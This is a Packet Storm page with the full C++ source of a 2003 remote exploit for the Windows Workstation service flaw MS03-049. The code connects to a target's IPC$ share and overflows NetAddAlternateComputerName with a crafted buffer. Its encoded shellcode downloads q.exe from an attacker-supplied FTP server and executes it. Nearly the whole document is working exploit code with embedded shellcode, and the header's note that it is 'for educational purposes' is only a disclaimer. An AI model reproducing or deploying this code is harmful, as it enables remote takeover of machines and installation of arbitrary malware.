Microsoft Windows WKSSVC remote exploit written in C++. Upon successful exploitation, it downloads a binary via a remote ftp server and executes it.
caa8fbce706837771cc1e25c2c20256ebb2cb17f6eb889669a511c48e355037f/* MS03-049
* windows wkssvc remote exploit by qaaz@centrum.cz. Nov 2003
* private until Dec 2003
*
* uses NetAddAlternateComputerName netapi function and thus
* - it is not limited to FAT32 filesystems
* - it is limited to XPs
*
* uses ninja shellcode decryptor by creed@pi.nxs.se with first
* four bytes modified by me.
*
* internal shellcode is not size optimized, but who cares about
* it - there is a lot of space on the stack. it downloads q.exe
* from a specified ftp server and executes it.
*
* this is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* have fun
* (and don't leave q.exe in windows system32 directory ;))
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib, "mpr.lib")
//////////////////////////////////////////////////////////////////
char ninja_header[] =
"\x54\x41\x41\x41\x5a\x52\x59\x68\x40\x40\x40\x40\x58\x50\x30\x62"
"\x4d\x30\x62\x4e\x30\x62\x6e\x40\x40\x40\x40\x30\x42\x4a\x40\x30"
"\x42\x50\x30\x42\x51\x58\x35\x40\x40\x40\x40\x48\x30\x62\x50\x30"
"\x62\x51\x30\x62\x75\x68\x40\x40\x40\x40\x58\x35\x40\x40\x40\x40"
"\x30\x42\x76\x32\x42\x76\x30\x62\x76\x42\x78\x58\x74\x68\x6c\x40"
"\x7a\x7a\x44\x32\x41\x76\x30\x41\x76\x68\x40\x40\x40\x40\x58\x35"
"\x40\x40\x40\x40\x30\x42\x76\x32\x42\x76\x30\x42\x76\x42\x6c\x40"
"\x30\x41\x76\x41\x75\x40";
char qaazcode[] =
"\xe9\x3d\x01\x00\x00\x5d\x8b\x5d\x00\x89\xd8\x83\xc0\x3c\x8b\x00"
"\x01\xd8\x05\x80\x00\x00\x00\x8b\x10\x01\xda\x8b\x02\x01\xd8\x89"
"\x45\x04\x83\xc2\x10\x8b\x02\x01\xd8\x89\x45\x08\x31\xc9\x31\xd2"
"\x8b\x45\x04\x01\xc8\x8b\x00\x01\xd8\x83\xc0\x02\x89\xc6\x8b\x45"
"\x08\x01\xc8\x8b\x00\x81\x3e\x4c\x6f\x61\x64\x75\x18\x81\x7e\x04"
"\x4c\x69\x62\x72\x75\x0f\x81\x7e\x08\x61\x72\x79\x41\x75\x06\x89"
"\x45\x1c\x42\xeb\x15\x81\x3e\x47\x65\x74\x50\x75\x0d\x81\x7e\x04"
"\x72\x6f\x63\x41\x75\x04\x89\x45\x20\x42\x83\xc1\x04\x83\xfa\x02"
"\x75\xae\x8b\x75\x1c\x8b\x7d\x20\x89\xe8\x83\xc0\x38\x50\xff\xd6"
"\x89\x45\x0c\x89\xe8\x83\xc0\x7c\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x30\x89\xe8\x05\x84\x00\x00\x00\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x34\x89\xe8\x83\xc0\x45\x50\xff\xd6\x89\x45\x10\x89\xe8\x83\xc0"
"\x51\x50\xff\x75\x10\xff\xd7\x89\x45\x24\x89\xe8\x83\xc0\x5f\x50"
"\xff\x75\x10\xff\xd7\x89\x45\x28\x89\xe8\x83\xc0\x70\x50\xff\x75"
"\x10\xff\xd7\x89\x45\x2c\x31\xdb\x53\x53\x53\x68\x01\x00\x00\x00"
"\x53\xff\x55\x24\x89\x45\x14\x53\x53\x68\x01\x00\x00\x00\x53\x53"
"\x68\x15\x00\x00\x00\x89\xe8\x05\x8f\x00\x00\x00\x50\xff\x75\x14"
"\xff\x55\x28\x89\x45\x18\x53\x68\x02\x00\x00\x00\x68\x80\x00\x00"
"\x00\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\x50\xff\x75\x18\xff\x55"
"\x2c\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\xff\x55\x30\x53\xff\x55"
"\x34\xc3\xe8\xbe\xfe\xff\xff\x49\x4d\x47\x42\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4b"
"\x45\x52\x4e\x45\x4c\x33\x32\x2e\x44\x4c\x4c\x00\x57\x49\x4e\x49"
"\x4e\x45\x54\x2e\x44\x4c\x4c\x00\x49\x6e\x74\x65\x72\x6e\x65\x74"
"\x4f\x70\x65\x6e\x41\x00\x49\x6e\x74\x65\x72\x6e\x65\x74\x43\x6f"
"\x6e\x6e\x65\x63\x74\x41\x00\x46\x74\x70\x47\x65\x74\x46\x69\x6c"
"\x65\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54"
"\x68\x72\x65\x61\x64\x00\x46\x54\x50\x2e\x46\x54\x50\x2e\x46\x54"
"\x50\x2e\x46\x54\x50\x00\x71\x2e\x65\x78\x65\x00";
typedef struct tagTARGET {
char *title;
unsigned long imagebase;
int padlen;
unsigned long retaddr;
int retlen;
BOOL ninja;
} TARGET;
TARGET targets[] = {
{ "Windows XP Pro, SP1", 0x75140000, 2044, 0x77da33a0, 0x10, TRUE }
};
//////////////////////////////////////////////////////////////////
typedef int (WINAPI * ADDALTCN) (char*, char*, void*, void*, long);
HINSTANCE hNetApi;
ADDALTCN fnNetAdd = NULL;
char szNetApi[] = "netapi32.dll";
char szNetAdd[] = "NetAddAlternateComputerName";
//////////////////////////////////////////////////////////////////
void banner()
{
printf("===============================================\n");
printf("windows wkssvc remote exploit by qaaz. Nov 2003\n");
printf("===============================================\n\n");
}
void usage(char* prog)
{
printf("usage:\n");
printf("%s <opt>:<optarg>\n", prog);
printf("\t-h:hostname\n"
"\t-t:target\n"
"\t-p:padlen\n"
"\t-r:retaddr\n"
"\t-l:retlen\n"
"\t-c:codefile\n"
"\t-f:ftpserver\n"
"\t-i:imagebase\n"
"\t-attack\n"
"\t-noninja\n"
"\n");
printf("targets:\n");
for (int i = 0; i < (sizeof(targets) / sizeof(TARGET)); i++)
printf("\t%d: %s\n", i, targets[i].title);
}
void ninja_encode(char* in, char* out, int len)
{
char temp[3];
for (int i = 0; i < len; i++)
{
sprintf(temp, "%c%c", ((*in>>4)&0xf)+0x40, (*in&0xf)+0x40);
strcat(out, temp);
in++;
}
strcat(out, "X");
}
//////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
int stat, i;
char opt, *optarg, *pchar;
TARGET target = targets[0];
BOOL attack = FALSE, ninja = TRUE;
char *hostname = NULL, *codefile = NULL, *ftpserv = NULL;
char ipc[1024];
char aname[1 * 1024];
char wname[2 * 1024];
char abuff[10 * 1024];
char wbuff[20 * 1024];
banner();
if (argc == 1)
{
usage(argv[0]);
return 1;
}
for (i = 1; i < argc; i++)
{
if (!strncmp(argv[i], "-h:", 3)) opt = 'h';
else if (!strncmp(argv[i], "-t:", 3)) opt = 't';
else if (!strncmp(argv[i], "-p:", 3)) opt = 'p';
else if (!strncmp(argv[i], "-r:", 3)) opt = 'r';
else if (!strncmp(argv[i], "-l:", 3)) opt = 'l';
else if (!strncmp(argv[i], "-c:", 3)) opt = 'c';
else if (!strncmp(argv[i], "-f:", 3)) opt = 'f';
else if (!strncmp(argv[i], "-i:", 3)) opt = 'i';
else if (!strcmp(argv[i], "-attack")) opt = 'a';
else if (!strcmp(argv[i], "-noninja")) opt = 'n';
else {
usage(argv[0]);
return 1;
}
if (argv[i][2] == ':')
optarg = argv[i] + 3;
else
optarg = "";
switch (opt)
{
case 'h':
hostname = optarg;
break;
case 't':
if (atoi(optarg) < 0 || atoi(optarg) > sizeof(targets))
return 1;
target = targets[atoi(optarg)];
break;
case 'p':
target.padlen = atoi(optarg);
break;
case 'r':
sscanf(optarg, "%lx", &target.retaddr);
break;
case 'l':
target.retlen = atoi(optarg);
break;
case 'c':
codefile = optarg;
break;
case 'f':
ftpserv = optarg;
break;
case 'i':
sscanf(optarg, "%lx", &target.imagebase);
break;
case 'a':
attack = TRUE;
break;
case 'n':
ninja = FALSE;
break;
}
}
sprintf(ipc, "\\\\%s\\ipc$", hostname);
sprintf(aname, "\\\\%s", hostname);
memset(wname, 0, sizeof(wname));
memset(abuff, 0, sizeof(abuff));
memset(wbuff, 0, sizeof(wbuff));
printf("[+] loading '%s' library...\n", szNetApi);
hNetApi = LoadLibrary(szNetApi);
if (hNetApi == NULL)
{
printf("[-] '%s' not loaded\n", szNetApi);
return 1;
}
printf("[+] loaded at %p\n", hNetApi);
printf("[+] locating '%s' function...\n", szNetAdd);
fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd);
if (fnNetAdd == NULL)
{
printf("[-] '%s' not found\n", szNetAdd);
return 1;
}
printf("[+] located at %p\n", fnNetAdd);
printf("[+] connecting to '%s'...\n", hostname);
NETRESOURCE nr;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.dwType = RESOURCETYPE_ANY;
nr.lpRemoteName = ipc;
stat = WNetAddConnection2(&nr, "", "", 0);
if (stat != 0)
{
printf("[-] WNetAddConnection2 failed\n");
return 1;
}
printf("[+] connected\n");
if (attack)
{
int slen = 0;
char scode[1 * 1024];
memset(scode, 0, sizeof(scode));
if (codefile)
{
FILE *fcode;
printf("[+] loading '%s' shellcode...\n", codefile);
if (!(fcode = fopen(codefile, "r")))
{
printf("[-] fopen failed\n");
return 1;
}
slen = fread(scode, 1, sizeof(scode), fcode);
fclose(fcode);
printf("[+] loaded %d B of shellcode\n", slen);
}
else
{
slen = sizeof(qaazcode);
memcpy(scode, qaazcode, slen);
for (i = 0; i < (slen - 15); i++)
{
pchar = scode + i;
if (!strncmp(pchar, "IMGB", 4))
*(unsigned long *)pchar = target.imagebase;
if (!strncmp(pchar, "FTP.FTP.FTP.FTP", 15))
strcpy(pchar, ftpserv);
}
}
memset(abuff, 'A', target.padlen + 4);
pchar = abuff + target.padlen;
*(unsigned long *)pchar = target.retaddr;
pchar += 4;
memset(pchar, 'A', target.retlen);
pchar += target.retlen;
if (ninja)
{
char ncode[2 * 1024];
memset(ncode, 0, sizeof(ncode));
ninja_encode(scode, ncode, slen);
memcpy(pchar, ninja_header, strlen(ninja_header));
pchar += strlen(ninja_header);
memcpy(pchar, ncode, (slen * 2) + 1);
}
else
{
memcpy(pchar, scode, slen);
}
}
else
{
strcpy(abuff, "[null]");
}
printf("[+] converting ansi strings to unicode\n");
MultiByteToWideChar(CP_ACP, 0, aname, strlen(aname) + 1, (WCHAR *)wname, sizeof(wname) / sizeof(wname[0]));
MultiByteToWideChar(CP_ACP, 0, abuff, strlen(abuff) + 1, (WCHAR *)wbuff, sizeof(wbuff) / sizeof(wbuff[0]));
printf("[+] sending query...\n");
stat = fnNetAdd((char *)wname, (char *)wbuff, NULL, NULL, 0);
printf("[+] sent (status: %d)\n", stat);
printf("[+] disconnecting\n");
WNetCancelConnection2(ipc, 0, TRUE);
FreeLibrary(hNetApi);
printf("[.] that's all folks\n");
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed